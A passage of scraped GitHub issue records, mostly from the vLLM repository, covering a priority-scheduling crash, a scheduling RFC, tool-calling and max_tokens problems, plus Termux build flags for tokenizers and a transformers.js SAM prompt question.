Compile and Install `tokenizers`\n\nNow, you can install the package using `pip`. The command below will automatically use the API level from the previous step.\n\n```bash\n# This command automatically gets your API level and uses it to compile tokenizers\nANDROID_API_LEVEL=$(getprop ro.build.version.sdk)\nCXXFLAGS=\"-lpthread -D__ANDROID_API__=${ANDROID_API_LEVEL}\" pip install tokenizers --no-binary :all:\n```\n\nAfter this, `pip install tokenizers` (and packages that depend on it) should succeed.\n\n#### Explanation of the Flags:\n\n* `CXXFLAGS=\"...\"`: This sets environment variables to pass flags to the C++ compiler.\n* `-lpthread`: This flag explicitly tells the linker to link against the POSIX threads library.\n* `-D__ANDROID_API__=${ANDROID_API_LEVEL}`: This is the critical part. It defines a macro that tells the C++ headers to expose functions available for your specific Android version, making `pthread_cond_clockwait` visible to the compiler.\n* `--no-binary :all:`: This forces `pip` to ignore pre-compiled wheels and build the package from the source code, which is necessary for the flags to be applied.\n\nHope this helps other developers working in the Termux environment!", "url": "https://github.com/huggingface/tokenizers/issues/1902", "state": "open", "labels": [], "created_at": "2025-12-01T00:46:42Z", "updated_at": "2025-12-01T00:46:42Z", "comments": 0, "user": "Manamama-Gemini-Cloud-AI-01" }, { "repo": "vllm-project/vllm", "number": 29747, "title": "[Bug]: --scheduling-policy=priority & n>1 crashes engine", "body": "### Your current environment\n\n
\nThe output of python collect_env.py\n\n```text\nYour output of `python collect_env.py` here\n```\n\n
\n\n\n### \ud83d\udc1b Describe the bug\n\nWhen running with priority scheduling, e.g.:\n```bash\nvllm serve Qwen/Qwen3-0.6B --scheduling-policy=priority\n```\n\nand using `n` > 1 in the request, like:\n```python\nfrom openai import OpenAI\n\nclient = OpenAI(base_url=\"http://localhost:8000/v1\", api_key=\"dummy\")\n\nres = client.chat.completions.create(\n model=client.models.list().data[0].id,\n messages=[{\"role\": \"user\", \"content\": \"What is the meaning of life?\"}],\n n=2\n)\n\nprint(res)\n```\n\nvllm crashes with:\n```python\n(EngineCore_DP0 pid=207394) ERROR 11-30 15:14:29 [core.py:844] EngineCore encountered a fatal error.\n(EngineCore_DP0 pid=207394) ERROR 11-30 15:14:29 [core.py:844] Traceback (most recent call last):\n(EngineCore_DP0 pid=207394) ERROR 11-30 15:14:29 [core.py:844] File \"/home/user/code/debug/.venv/lib/python3.10/site-packages/vllm/v1/engine/core.py\", line 835, in run_engine_core\n(EngineCore_DP0 pid=207394) ERROR 11-30 15:14:29 [core.py:844] engine_core.run_busy_loop()\n(EngineCore_DP0 pid=207394) ERROR 11-30 15:14:29 [core.py:844] File \"/home/user/code/debug/.venv/lib/python3.10/site-packages/vllm/v1/engine/core.py\", line 860, in run_busy_loop\n(EngineCore_DP0 pid=207394) ERROR 11-30 15:14:29 [core.py:844] self._process_input_queue()\n(EngineCore_DP0 pid=207394) ERROR 11-30 15:14:29 [core.py:844] File \"/home/user/code/debug/.venv/lib/python3.10/site-packages/vllm/v1/engine/core.py\", line 885, in _process_input_queue\n(EngineCore_DP0 pid=207394) ERROR 11-30 15:14:29 [core.py:844] self._handle_client_request(*req)\n(EngineCore_DP0 pid=207394) ERROR 11-30 15:14:29 [core.py:844] File \"/home/user/code/debug/.venv/lib/python3.10/site-packages/vllm/v1/engine/core.py\", line 907, in _handle_client_request\n(EngineCore_DP0 pid=207394) ERROR 11-30 15:14:29 [core.py:844] self.add_request(req, request_wave)\n(EngineCore_DP0 pid=207394) ERROR 11-30 15:14:29 [core.py:844] File \"/home/user/code/debug/.venv/lib/python3.10/site-packages/vllm/v1/engine/core.py\", line 291, in add_request\n(EngineCore_DP0 pid=207394) ERROR 11-30 15:14:29 [core.py:844] self.scheduler.add_request(request)\n(EngineCore_DP0 pid=207394) ERROR 11-30 15:14:29 [core.py:844] File \"/home/user/code/debug/.venv/lib/python3.10/site-packages/vllm/v1/core/sched/scheduler.py\", line 1242, in add_request\n(EngineCore_DP0 pid=207394) ERROR 11-30 15:14:29 [core.py:844] self.waiting.add_request(request)\n(EngineCore_DP0 pid=207394) ERROR 11-30 15:14:29 [core.py:844] File \"/home/user/code/debug/.venv/lib/python3.10/site-packages/vllm/v1/core/sched/request_queue.py\", line 150, in add_request\n(EngineCore_DP0 pid=207394) ERROR 11-30 15:14:29 [core.py:844] heapq.heappush(self._heap, (request.priority, request.arrival_time, request))\n(EngineCore_DP0 pid=207394) ERROR 11-30 15:14:29 [core.py:844] TypeError: '<' not supported between instances of 'Request' and 'Request'\n(EngineCore_DP0 pid=207394) Process EngineCore_DP0:\n(APIServer pid=207278) ERROR 11-30 15:14:29 [async_llm.py:525] AsyncLLM output_handler failed.\n(APIServer pid=207278) ERROR 11-30 15:14:29 [async_llm.py:525] Traceback (most recent call last):\n(APIServer pid=207278) ERROR 11-30 15:14:29 [async_llm.py:525] File \"/home/user/code/debug/.venv/lib/python3.10/site-packages/vllm/v1/engine/async_llm.py\", line 477, in output_handler\n(APIServer pid=207278) ERROR 11-30 15:14:29 [async_llm.py:525] outputs = await engine_core.get_output_async()\n(APIServer pid=207278) ERROR 11-30 15:14:29 [async_llm.py:525] File 
\"/home/user/code/debug/.venv/lib/python3.10/site-packages/vllm/v1/engine/core_client.py\", line 883, in get_output_async\n(APIServer pid=207278) ERROR 11-30 15:14:29 [async_llm.py:525] raise self._format_exception(outputs) from None\n(APIServer pid=207278) ERROR 11-30 15:14:29 [async_llm.py:525] vllm.v1.engine.exceptions.EngineDeadError: EngineCore encountered an issue. See stack trace (above) for the root cause.\n(EngineCore_DP0 pid=207394) Traceback (most recent call last):\n(EngineCore_DP0 pid=207394) File \"/usr/lib/python3.10/multiprocessing/process.py\", line 314, in _bootstrap\n(EngineCore_DP0 pid=207394) self.run()\n(EngineCore_DP0 pid=207394) File \"/usr/lib/python3.10/multiprocessing/process.py\", line 108, in run\n(EngineCore_DP0 pid=207394) self._target(*self._args, **self._kwargs)\n(EngineCore_DP0 pid=207394) File \"/home/user/code/debug/.venv/lib/python3.10/site-packages/vllm/v1/engine/core.py\", line 846, in run_engine_core\n(EngineCore_DP0 pid=207394) raise e\n(EngineCore_DP0 pid=207394) File \"/home/user/code/debug/.venv/lib/python3.10/site-packages/vllm/v1/engine/core.py\", line 835, in run_engine_core\n(EngineCore_DP0 pid=207394) engine_core.run_busy_loop()\n(EngineCore_DP0 pid=207394) File \"/home/user/code/debug/.venv/lib/python3.10/site-packages/vllm/v1/engine/core.py\", line 860, in", "url": "https://github.com/vllm-project/vllm/issues/29747", "state": "closed", "labels": [ "bug" ], "created_at": "2025-11-30T13:20:23Z", "updated_at": "2025-12-02T22:42:30Z", "comments": 3, "user": "hibukipanim" }, { "repo": "vllm-project/vllm", "number": 29735, "title": "[Usage]:Accessing free_blocks count from LLMEngine or LLM ?", "body": "### Your current environment\n\n```text\nNone\n```\n\n### How would you like to use vllm\n\nI'm doing research on key-value caching optimization. I want to know how to determine the number of free blocks during runtime. I tried manually creating the engine, but I couldn't find the method after searching through the code.\nAI keeps providing methods that have already been abandoned.\nI would be very grateful for any help, as this has been puzzling me for hours.\n\n### Before submitting a new issue...\n\n- [x] Make sure you already searched for relevant issues, and asked the chatbot living at the bottom right corner of the [documentation page](https://docs.vllm.ai/en/latest/), which can answer lots of frequently asked questions.", "url": "https://github.com/vllm-project/vllm/issues/29735", "state": "closed", "labels": [ "usage" ], "created_at": "2025-11-29T19:21:50Z", "updated_at": "2025-12-05T14:01:42Z", "comments": 4, "user": "H-T-H" }, { "repo": "vllm-project/vllm", "number": 29722, "title": "[RFC]: Add Balance Scheduling", "body": "### Motivation.\n\n**Limitations of the current vLLM v1 scheduling strategy**\nvLLM v1 scheduling currently enables chunkedprefill by default, which processes prefill and decode requests simultaneously in a single scheduling session. This can impact the overall system throughput and performance in some scenarios.\n\nBalance scheduling addresses this issue by synchronizing the number of running queues across all schedulers to delay the scheduling of new requests, thereby improving the overall system's steady-state decoding time. 
Balance scheduling achieves:\n\u2705 Adding `balance_gather` to the scheduler synchronizes the number of requests in the running queues across DP ranks.\n\u2705 Balance scheduling extends the decode steady-state time, thereby increasing the overall output throughput of the inference system.\n\n\n### Proposed Change.\n\n**1. Feature Overview**\n\nIn the vLLM scheduler, running requests (i.e., requests whose prefill computation has already started) have the highest priority, followed by waiting requests (i.e., requests that have not yet been computed).\n\n\nAs shown in the diagram above, when the inference system exits a steady state, the scheduler schedules a batch of new requests for prefill and then synchronizes them across the data-parallel (DP) ranks. This can force DP ranks that are running pure decode steps to synchronize with the prefill token counts of other ranks. Frequent prefill scheduling on some DP ranks can therefore degrade the output throughput of the whole system.\n\nBalance scheduling synchronizes the number of running requests across DP ranks, and only schedules new requests for prefill once every scheduler's running queue has fewer than `max_num_seqs` requests.\n\n**2. Implementation Design**\n\n**3. Experiment Results**\n- Fixed-length input scenario: in a performance test with 3.5K fixed-length inputs and 1.5K fixed-length outputs, throughput improved by approximately **18%** after adding balance scheduling.\n\n| Method | Model | Input Len | Request Count | Output Len | BatchSize | Average TTFT | Average TPOT | e2e duration | Input Token Throughput | Output Token Throughput | Request Throughput |\n| ---- | ---- | ---- | ---- | ---- | ---- | ---- | ---- | ---- | ---- | ---- | ---- |\n| Baseline | DeepSeekV3.1 | 3500 | 512 | 1500 | 128 | 6600 | 86.85 | 591.9s | 3030.5 | 1297.3 | 0.86 |\n| Balance scheduling | DeepSeekV3.1 | 3500 | 512 | 1500 | 128 | 7012 | 70.63 | 501.7s | 3575.7 | 1530.7 | 1.02 |\n\n**4. Demo PR**\n\n[#29721](https://github.com/vllm-project/vllm/pull/29721)\n\n\n### Feedback Period.\n\nNo response\n\n### CC List.\n\nNo response\n\n### Any Other Things.\n\nNo response\n\n### Before submitting a new issue...\n\n\n- [x] Make sure you already searched for relevant issues, and asked the chatbot living at the bottom right corner of the [documentation page](https://docs.vllm.ai/en/latest/), which can answer lots of frequently asked questions.", "url": "https://github.com/vllm-project/vllm/issues/29722", "state": "open", "labels": [ "RFC" ], "created_at": "2025-11-29T09:28:43Z", "updated_at": "2025-12-02T08:23:33Z", "comments": 0, "user": "GDzhu01" }, { "repo": "vllm-project/vllm", "number": 29707, "title": "[Usage]: Workaround to run model on GPUs with Compute Capability < 8.0?", "body": "### Your current environment\n\nProblem:\nI am unable to run the Qwen3-VL-32B-Instruct-AWQ-4bit model due to a CUDA compute capability requirement. My hardware consists of two NVIDIA QUADRO RTX 5000 cards (16GB each, 32GB total) with a compute capability of 7.5. The software framework (likely a recent version of PyTorch or a specific library) raises an error:\n\n\"GPUs with compute capability < 8.0 are not supported.\"\n\nQuestion:\nAre there any workarounds to run this model on my older QUADRO RTX 5000 GPUs? 
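For reference, here is a quick sanity check of what the capability gate is reacting to (plain PyTorch, nothing vLLM-specific). The usual culprit on Turing (sm_75) cards is bfloat16, which requires compute capability >= 8.0, so forcing float16 with `--dtype half` is often the first experiment to try; whether the AWQ kernels for this particular model support sm_75 in a given vLLM build is a separate question:

```python
import torch

# Report the compute capability of each visible GPU.
# Turing (Quadro RTX 5000) is sm_75; Ampere and newer are sm_80+.
for i in range(torch.cuda.device_count()):
    major, minor = torch.cuda.get_device_capability(i)
    print(f"GPU {i}: {torch.cuda.get_device_name(i)} -> sm_{major}{minor}")

# bfloat16 support is what the ">= 8.0" check is usually about.
print("bf16 supported:", torch.cuda.is_bf16_supported())
```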
Thanks in advance.\n\n\n```\n vllm collect-env\nINFO 11-29 20:49:15 [__init__.py:216] Automatically detected platform cuda.\nCollecting environment information...\n==============================\n System Info\n==============================\nOS : Ubuntu 24.04.3 LTS (x86_64)\nGCC version : (Ubuntu 13.3.0-6ubuntu2~24.04) 13.3.0\nClang version : Could not collect\nCMake version : version 3.30.3\nLibc version : glibc-2.39\n\n==============================\n PyTorch Info\n==============================\nPyTorch version : 2.8.0+cu128\nIs debug build : False\nCUDA used to build PyTorch : 12.8\nROCM used to build PyTorch : N/A\n\n==============================\n Python Environment\n==============================\nPython version : 3.12.11 | packaged by Anaconda, Inc. | (main, Jun 5 2025, 13:09:17) [GCC 11.2.0] (64-bit runtime)\nPython platform : Linux-6.14.0-27-generic-x86_64-with-glibc2.39\n\n==============================\n CUDA / GPU Info\n==============================\nIs CUDA available : True\nCUDA runtime version : 12.0.140\nCUDA_MODULE_LOADING set to : LAZY\nGPU models and configuration :\nGPU 0: Quadro RTX 5000\nGPU 1: Quadro RTX 5000\n\nNvidia driver version : 580.65.06\ncuDNN version : Could not collect\nHIP runtime version : N/A\nMIOpen runtime version : N/A\nIs XNNPACK available : True\n\n==============================\n CPU Info\n==============================\nArchitecture: x86_64\nCPU op-mode(s): 32-bit, 64-bit\nAddress sizes: 46 bits physical, 48 bits virtual\nByte Order: Little Endian\nCPU(s): 20\nOn-line CPU(s) list: 0-19\nVendor ID: GenuineIntel\nModel name: Intel(R) Core(TM) i9-10900X CPU @ 3.70GHz\nCPU family: 6\nModel: 85\nThread(s) per core: 2\nCore(s) per socket: 10\nSocket(s): 1\nStepping: 7\nCPU(s) scaling MHz: 28%\nCPU max MHz: 4700.0000\nCPU min MHz: 1200.0000\nBogoMIPS: 7399.70\nFlags: fpu vme de pse tsc msr pae mce cx8 apic sep mtrr pge mca cmov pat pse36 clflush dts acpi mmx fxsr sse sse2 ss ht tm pbe syscall nx pdpe1gb rdtscp lm constant_tsc art arch_perfmon pebs bts rep_good nopl xtopology nonstop_tsc cpuid aperfmperf pni pclmulqdq dtes64 monitor ds_cpl est tm2 ssse3 sdbg fma cx16 xtpr pdcm pcid dca sse4_1 sse4_2 x2apic movbe popcnt tsc_deadline_timer aes xsave avx f16c rdrand lahf_lm abm 3dnowprefetch cpuid_fault epb cat_l3 cdp_l3 ssbd mba ibrs ibpb stibp ibrs_enhanced fsgsbase tsc_adjust bmi1 avx2 smep bmi2 erms invpcid cqm mpx rdt_a avx512f avx512dq rdseed adx smap clflushopt clwb intel_pt avx512cd avx512bw avx512vl xsaveopt xsavec xgetbv1 xsaves cqm_llc cqm_occup_llc cqm_mbm_total cqm_mbm_local dtherm ida arat pln pts hwp hwp_act_window hwp_epp hwp_pkg_req avx512_vnni md_clear flush_l1d arch_capabilities\nL1d cache: 320 KiB (10 instances)\nL1i cache: 320 KiB (10 instances)\nL2 cache: 10 MiB (10 instances)\nL3 cache: 19.3 MiB (1 instance)\nNUMA node(s): 1\nNUMA node0 CPU(s): 0-19\nVulnerability Gather data sampling: Vulnerable\nVulnerability Ghostwrite: Not affected\nVulnerability Itlb multihit: KVM: Mitigation: VMX unsupported\nVulnerability L1tf: Not affected\nVulnerability Mds: Not affected\nVulnerability Meltdown: Not affected\nVulnerability Mmio stale data: Mitigation; Clear CPU buffers; SMT vulnerable\nVulnerability Reg file data sampling: Not affected\nVulnerability Retbleed: Mitigation; Enhanced IBRS\nVulnerability Spec rstack overflow: Not affected\nVulnerability Spec store bypass: Mitigation; Speculative Store Bypass disabled via prctl\nVulnerability Spectre v1: Mitigation; usercopy/swapgs barriers and __user pointer sanitization\nVulnerability Spectre 
v2: Mitigation; Enhanced / Aut", "url": "https://github.com/vllm-project/vllm/issues/29707", "state": "closed", "labels": [ "usage" ], "created_at": "2025-11-29T00:47:39Z", "updated_at": "2025-11-30T06:04:29Z", "comments": 5, "user": "seasoncool" }, { "repo": "vllm-project/vllm", "number": 29679, "title": "[Usage]: Get request total time", "body": "### Your current environment\n\n```text\n==============================\n System Info\n==============================\nOS : Ubuntu 22.04.5 LTS (x86_64)\nGCC version : (Ubuntu 11.4.0-1ubuntu1~22.04) 11.4.0\nClang version : Could not collect\nCMake version : version 3.28.0\nLibc version : glibc-2.35\n\n==============================\n PyTorch Info\n==============================\nPyTorch version : 2.9.0+cu128\nIs debug build : False\nCUDA used to build PyTorch : 12.8\nROCM used to build PyTorch : N/A\n\n==============================\n Python Environment\n==============================\nPython version : 3.10.19 | packaged by conda-forge | (main, Oct 22 2025, 22:29:10) [GCC 14.3.0] (64-bit runtime)\nPython platform : Linux-6.8.0-1030-azure-x86_64-with-glibc2.35\n\n==============================\n CUDA / GPU Info\n==============================\nIs CUDA available : True\nCUDA runtime version : Could not collect\nCUDA_MODULE_LOADING set to : \nGPU models and configuration : GPU 0: NVIDIA H100 NVL\nNvidia driver version : 535.247.01\ncuDNN version : Probably one of the following:\n/usr/lib/x86_64-linux-gnu/libcudnn.so.9.10.2\n/usr/lib/x86_64-linux-gnu/libcudnn_adv.so.9.10.2\n/usr/lib/x86_64-linux-gnu/libcudnn_cnn.so.9.10.2\n/usr/lib/x86_64-linux-gnu/libcudnn_engines_precompiled.so.9.10.2\n/usr/lib/x86_64-linux-gnu/libcudnn_engines_runtime_compiled.so.9.10.2\n/usr/lib/x86_64-linux-gnu/libcudnn_graph.so.9.10.2\n/usr/lib/x86_64-linux-gnu/libcudnn_heuristic.so.9.10.2\n/usr/lib/x86_64-linux-gnu/libcudnn_ops.so.9.10.2\nHIP runtime version : N/A\nMIOpen runtime version : N/A\nIs XNNPACK available : True\n\n==============================\n CPU Info\n==============================\nArchitecture: x86_64\nCPU op-mode(s): 32-bit, 64-bit\nAddress sizes: 48 bits physical, 48 bits virtual\nByte Order: Little Endian\nCPU(s): 40\nOn-line CPU(s) list: 0-39\nVendor ID: AuthenticAMD\nModel name: AMD EPYC 9V84 96-Core Processor\nCPU family: 25\nModel: 17\nThread(s) per core: 1\nCore(s) per socket: 40\nSocket(s): 1\nStepping: 1\nBogoMIPS: 4800.05\nFlags: fpu vme de pse tsc msr pae mce cx8 apic sep mtrr pge mca cmov pat pse36 clflush mmx fxsr sse sse2 ht syscall nx mmxext fxsr_opt pdpe1gb rdtscp lm constant_tsc rep_good nopl tsc_reliable nonstop_tsc cpuid extd_apicid aperfmperf tsc_known_freq pni pclmulqdq ssse3 fma cx16 pcid sse4_1 sse4_2 movbe popcnt aes xsave avx f16c rdrand hypervisor lahf_lm cmp_legacy cr8_legacy abm sse4a misalignsse 3dnowprefetch osvw topoext perfctr_core vmmcall fsgsbase bmi1 avx2 smep bmi2 erms invpcid avx512f avx512dq rdseed adx smap avx512ifma clflushopt clwb avx512cd sha_ni avx512bw avx512vl xsaveopt xsavec xgetbv1 xsaves user_shstk avx512_bf16 clzero xsaveerptr rdpru arat avx512vbmi umip avx512_vbmi2 gfni vaes vpclmulqdq avx512_vnni avx512_bitalg avx512_vpopcntdq rdpid fsrm\nHypervisor vendor: Microsoft\nVirtualization type: full\nL1d cache: 1.3 MiB (40 instances)\nL1i cache: 1.3 MiB (40 instances)\nL2 cache: 40 MiB (40 instances)\nL3 cache: 160 MiB (5 instances)\nNUMA node(s): 1\nNUMA node0 CPU(s): 0-39\nVulnerability Gather data sampling: Not affected\nVulnerability Itlb multihit: Not affected\nVulnerability L1tf: Not affected\nVulnerability 
Mds: Not affected\nVulnerability Meltdown: Not affected\nVulnerability Mmio stale data: Not affected\nVulnerability Reg file data sampling: Not affected\nVulnerability Retbleed: Not affected\nVulnerability Spec rstack overflow: Vulnerable: Safe RET, no microcode\nVulnerability Spec store bypass: Vulnerable\nVulnerability Spectre v1: Mitigation; usercopy/swapgs barriers and __user pointer sanitization\nVulnerability Spectre v2: Mitigation; Retpolines; STIBP disabled; RSB filling; PBRSB-eIBRS Not affected; BHI Not affected\nVulnerability Srbds: Not affected\nVulnerability Tsx async abort: Not affected\n\n==============================\nVersions of relevant libraries\n==============================\n[pip3] flashinfer-python==0.5.2\n[pip3] numpy==1.26.4\n[pip3] nvidia-cublas-cu12==12.8.4.1\n[pip3] nvidia-cuda-cupti-cu12==12.8.90\n[pip3] nvidia-cuda-nvrtc-cu12==12.8.93\n[pip3] nvidia-cuda-runtime-cu12==12.8.90\n", "url": "https://github.com/vllm-project/vllm/issues/29679", "state": "closed", "labels": [ "usage" ], "created_at": "2025-11-28T14:03:16Z", "updated_at": "2025-12-01T09:34:12Z", "comments": 5, "user": "chwundermsft" }, { "repo": "huggingface/lerobot", "number": 2543, "title": "Different finetune loss given policy.type=pi0 / policy.path=lerobot/pi0_base. What is the difference?", "body": "Hi, I have two different configurations:\n1. `\t--dataset.repo_id=BBBBBBob/libero_goal_lerobot \\\n\t--dataset.root=/home/j84403411/data/libero/libero_goal_lerobot \\\n\t--policy.path=lerobot/pi0_base \\\n\t--policy.push_to_hub=false \\\n\t--policy.use_proprio=true \\\n\t--output_dir=/home/j84403411/checkpoint/libero/pi0/libero_goal_proprio \\\n --policy.dtype=bfloat16 \\\n --steps=40_000 \\\n --batch_size=16 \\\n --rename_map='{\"observation.images.image\":\"observation.images.base_0_rgb\", \"observation.images.wrist_image\":\"observation.images.left_wrist_0_rgb\"}' \\ `\nand\n2.\n `\t--dataset.repo_id=BBBBBBob/libero_goal_lerobot \\\n\t--dataset.root=/home/j84403411/data/libero/libero_goal_lerobot \\\n\t--policy.type=pi0 \\\n --policy.pretrained_path=lerobot/pi0_base \\\n\t--policy.push_to_hub=false \\\n\t--policy.use_proprio=true \\\n\t--output_dir=/home/j84403411/checkpoint/libero/pi0/libero_goal_proprio \\\n --policy.dtype=bfloat16 \\\n --steps=40_000 \\\n --batch_size=16 \\\n --policy.input_features='{\"observation.state\": {\"type\": \"STATE\", \"shape\": [8]},\n\t\t\"observation.images.wrist_image\": {\"type\": \"VISUAL\", \"shape\": [3, 256, 256]},\n\t \t\"observation.images.image\": {\"type\": \"VISUAL\", \"shape\": [3, 256, 256]},\n\t\t}' \\\n --policy.output_features='{\"action\": {\"type\": \"ACTION\", \"shape\": [7]}}' \\ `\n\n\nThe loss trained from the second configuration is 10 times higher than the first one. What caused the difference? Do you know if different checkpoints are loaded in this case? I appreciate your help! 
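One way to narrow this down, independent of lerobot internals, is to construct the policy both ways in a single script and diff their state dicts; if the tensors differ, the two configurations are not restoring the same checkpoint. A minimal plain-PyTorch sketch (`policy_a`/`policy_b` stand in for however you build the policies from the two configurations):

```python
import torch
import torch.nn as nn

def diff_state_dicts(a: nn.Module, b: nn.Module, atol: float = 0.0) -> None:
    """Print which parameters differ between two same-architecture models."""
    sd_a, sd_b = a.state_dict(), b.state_dict()
    only_a = sorted(sd_a.keys() - sd_b.keys())
    only_b = sorted(sd_b.keys() - sd_a.keys())
    if only_a or only_b:
        print("keys only in first:", only_a)
        print("keys only in second:", only_b)
    for key in sorted(sd_a.keys() & sd_b.keys()):
        ta, tb = sd_a[key], sd_b[key]
        if ta.shape != tb.shape:
            print(f"shape differs: {key} {tuple(ta.shape)} vs {tuple(tb.shape)}")
        elif not torch.allclose(ta.float(), tb.float(), atol=atol):
            print(f"values differ: {key}")

# diff_state_dicts(policy_a, policy_b)
```

If the `--policy.type=pi0` path turns out to initialize some weights from scratch (or to apply different normalization statistics) while `--policy.path` restores the full pretrained checkpoint, that alone would explain a 10x loss gap.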
", "url": "https://github.com/huggingface/lerobot/issues/2543", "state": "closed", "labels": [], "created_at": "2025-11-28T12:34:38Z", "updated_at": "2025-12-01T11:25:17Z", "user": "BBBBBBob" }, { "repo": "huggingface/transformers.js", "number": 1467, "title": "Missing the following inputs: input_points, input_labels (or input_boxes)", "body": "### Question\n\nthanks for your excellent works!\n\nI just write test code for SlimSAM model powered by transformers.js referring to this example(with some improvements): https://github.com/huggingface/transformers.js-examples/blob/main/segment-anything-webgpu/index.js\n\nmy code for `decode` method:\n```js\n// Decode segmentation\nasync function decode() {\n if (!imageEmbeddings || isDecoding || isEncoding) return;\n\n if (isDecoding) {\n decodePending = true;\n return;\n }\n isDecoding = true;\n\n try {\n let input_points = null;\n let input_labels = null;\n let input_boxes = null;\n let outputs = null;\n \n if (promptMode == \"point\" && points.length > 0) {\n const reshaped = imageprocessed.reshaped_input_sizes[0]; // [H, W]\n const scaledPoints = points.map(p => [\n p.x * reshaped[1],\n p.y * reshaped[0]\n ]);\n const labels = points.map(p => BigInt(p.label));\n\n input_points = new Tensor(\"float32\", scaledPoints.flat(), [1, 1, points.length, 2]);\n input_labels = new Tensor(\"int64\", labels, [1, 1, points.length]);\n\n // Fallback: if no prompts, skip\n if (!input_points) return;\n\n // Run model with point mode\n outputs = await model({\n ...imageEmbeddings,\n input_points: input_points,\n input_labels: input_labels,\n input_boxes: null\n });\n }\n\n if (promptMode == \"box\" && box) {\n const reshaped = imageprocessed.reshaped_input_sizes[0];\n const [x1, y1, x2, y2] = [\n box.x1 * reshaped[1],\n box.y1 * reshaped[0],\n box.x2 * reshaped[1],\n box.y2 * reshaped[0]\n ];\n input_boxes = new Tensor(\"float32\", [x1, y1, x2, y2], [1, 1, 4]);\n\n // Fallback: if no prompts, skip\n if (!input_boxes) return;\n\n // Run model with box mode\n outputs = await model({\n ...imageEmbeddings,\n input_points: null,\n input_labels: null,\n input_boxes: input_boxes\n });\n }\n\n // Post-process\n const masks = await processor.post_process_masks(\n outputs.pred_masks,\n imageprocessed.original_sizes,\n imageprocessed.reshaped_input_sizes\n );\n\n const scores = outputs.iou_scores.data;\n updateMask(masks[0], scores); // masks[0] is [3, H, W]\n\n } catch (e) {\n console.error(\"Decode error:\", e);\n statusEl.textContent = \"\u274c Segmentation failed.\";\n } finally {\n isDecoding = false;\n if (decodePending) {\n decodePending = false;\n decode();\n }\n }\n}\n```\nit supports 2 prompt modes: `point` &` box` which selected by users on UI elements (html not provided).\nbut error printed every time when running `decode` method (at the line of calling `outputs = await model(...)`), the error message is:\n\nwith box prompt mode:\n`Error: An error occurred during model execution: \"Missing the following inputs: input_points, input_labels.`\n\nwith point prompt mode:\n`Error: An error occurred during model execution: \"Missing the following inputs: input_boxes.`\n\n\nShould I pass all three parameters(input_points/input_labels/input_boxes) simultaneously, regardless of which prompt mode I\u2019m using? How could I support point & box at the same time, since no demo codes found on internet. 
thanks!\n\n```\nversion: transformers.js 3.5.0 from https://cdn.jsdelivr.net/npm/@huggingface/transformers@3.5.0\nos: Windows 10\nchrome: 142\nmodel: Xenova/slimsam-77-uniform\n```", "url": "https://github.com/huggingface/transformers.js/issues/1467", "state": "closed", "labels": [ "question" ], "created_at": "2025-11-28T10:01:04Z", "updated_at": "2025-12-01T04:04:59Z", "user": "sherlockchou86" }, { "repo": "vllm-project/vllm", "number": 29643, "title": "[Usage]: Enabling Tool call in the Python SDK", "body": "### Your current environment\n\nHi Team,\n\nI am currently exploring vLLM to enable tool calling, and I need some support with this. It would be very helpful if you could provide the corresponding Python code.\n\nWhat I\u2019m trying to achieve is to configure the Python package with the same settings that I use when starting the vLLM server. The configuration I\u2019m using is:\n\nvllm serve DeepSeek-R1-0528-Qwen3-8B \\\n --served-model-name deepseek \\\n --gpu_memory_utilization 0.5 \\\n --max_num_seqs 20 \\\n --max_model_len 10000 \\\n --enable-auto-tool-choice \\\n --tool-call-parser deepseek_v3 \\\n --chat-template tool_chat_template_deepseekr1.jinja \\\n --port 5050 \\\n --max_num_batched_tokens 5000\n\nI need to replicate this exact configuration in Python.\n\nYour support would be greatly appreciated. Please respond at your earliest convenience.\n\nBest Regards\nMadan \n\n\n### How would you like to use vllm\n\n\n\nI want to use vLLM to serve a model with tool-calling support enabled. Specifically, I need to run the model with the same configuration parameters that I currently use when launching the vLLM server from the command line. These settings include GPU memory utilization, maximum sequence limits, tool-calling options, a custom tool-call parser, and a custom chat template.\n\nMy goal is to reproduce the following server configuration within a Python environment using the vLLM Python API:\n\nvllm serve DeepSeek-R1-0528-Qwen3-8B \\\n --served-model-name deepseek \\\n --gpu_memory_utilization 0.5 \\\n --max_num_seqs 20 \\\n --max_model_len 10000 \\\n --enable-auto-tool-choice \\\n --tool-call-parser deepseek_v3 \\\n --chat-template tool_chat_template_deepseekr1.jinja \\\n --port 5050 \\\n --max_num_batched_tokens 5000\n\nIn short, I need Python code that sets these exact configurations so I can run vLLM programmatically with tool calling enabled.\n\n\n### Before submitting a new issue...\n\n- [x] Make sure you already searched for relevant issues, and asked the chatbot living at the bottom right corner of the [documentation page](https://docs.vllm.ai/en/latest/), which can answer lots of frequently asked questions.", "url": "https://github.com/vllm-project/vllm/issues/29643", "state": "open", "labels": [ "usage" ], "created_at": "2025-11-28T04:39:47Z", "updated_at": "2025-12-01T14:54:47Z", "comments": 2, "user": "Madan1215" }, { "repo": "vllm-project/vllm", "number": 29641, "title": "[Bug]: Max Tokens not being honoured in Chat Completions for GPTOSS model", "body": "### Your current environment\n\nIt seems that in recent vLLM versions (0.11+), Chat Completions has stopped honouring `max_tokens` with the GPT-OSS 120B model: the request payload below used to produce output up to the `max_tokens` limit, but no longer does. 
\n\nInterestingly if you look at the `usage` tokens, it's showing `completion_tokens` as 500 but the output is BLANK.\n\n```json\n{\n \"messages\": [\n {\n \"role\": \"user\",\n \"content\": \"What is the role of AI in medicine?\"\n }\n ],\n \"model\": \"openai/gpt-oss-120b\",\n \"max_tokens\": 500,\n \"reasoning\": {\"effort\": \"low\"},\n \"stream\": false\n}\n```\n\ngetting BLANK output, even though the `usage` is showing token counts created is matching max_tokens \n\n```json\n{\n \"id\": \"chatcmpl-c71e934ac0b74bd4b8f99fe9b5516ea3\",\n \"object\": \"chat.completion\",\n \"created\": 1764300020,\n \"model\": \"openai/gpt-oss-120b\",\n \"choices\": [\n {\n \"index\": 0,\n \"message\": {\n \"role\": \"assistant\",\n \"content\": null,\n \"refusal\": null,\n \"annotations\": null,\n \"audio\": null,\n \"function_call\": null,\n \"tool_calls\": [],\n \"reasoning\": \"Need to answer.\",\n \"reasoning_content\": \"Need to answer.\"\n },\n \"logprobs\": null,\n \"finish_reason\": \"length\",\n \"stop_reason\": null,\n \"token_ids\": null\n }\n ],\n \"service_tier\": null,\n \"system_fingerprint\": null,\n \"usage\": {\n \"prompt_tokens\": 78,\n \"total_tokens\": 578,\n \"completion_tokens\": 500,\n \"prompt_tokens_details\": null\n },\n \"prompt_logprobs\": null,\n \"prompt_token_ids\": null,\n \"kv_transfer_params\": null\n}\n```\n\nWhen you remove the `max_tokens`, we get the output which shows `usage_token` to have `completion_tokens` to be around 1600 